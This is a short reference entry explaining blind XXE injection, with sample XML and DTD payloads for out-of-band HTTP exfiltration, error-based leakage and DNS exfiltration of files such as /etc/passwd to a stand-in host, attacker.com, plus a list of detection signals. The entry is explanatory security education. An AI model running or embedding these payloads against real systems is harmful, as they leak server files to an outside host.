Blind XXE

Blind XXE is a variant of XML External Entity injection where the application does not return the entity value in its response. Attackers must use out-of-band techniques to exfiltrate data or confirm the vulnerability.

How It Works

When an XXE vulnerability exists but the parsed data isn't reflected in the response, attackers use external DTDs hosted on their server to extract data through DNS queries, HTTP requests, or error messages.

Out-of-Band Data Exfiltration

<!-- Malicious XML sent to target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root></root>

<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

Error-Based XXE

<!-- Force error message containing file data -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

DNS Exfiltration

<!-- Exfiltrate via DNS subdomain -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://%file;.attacker.com/'>">
%eval;
%exfil;

Detection Techniques

• DNS callback to attacker-controlled domain
• HTTP request to attacker server
• Triggered error messages containing data
• Time-based detection (slow file reads)

See Also

• XML External Entity
• Document Type Definition
• Blind SSRF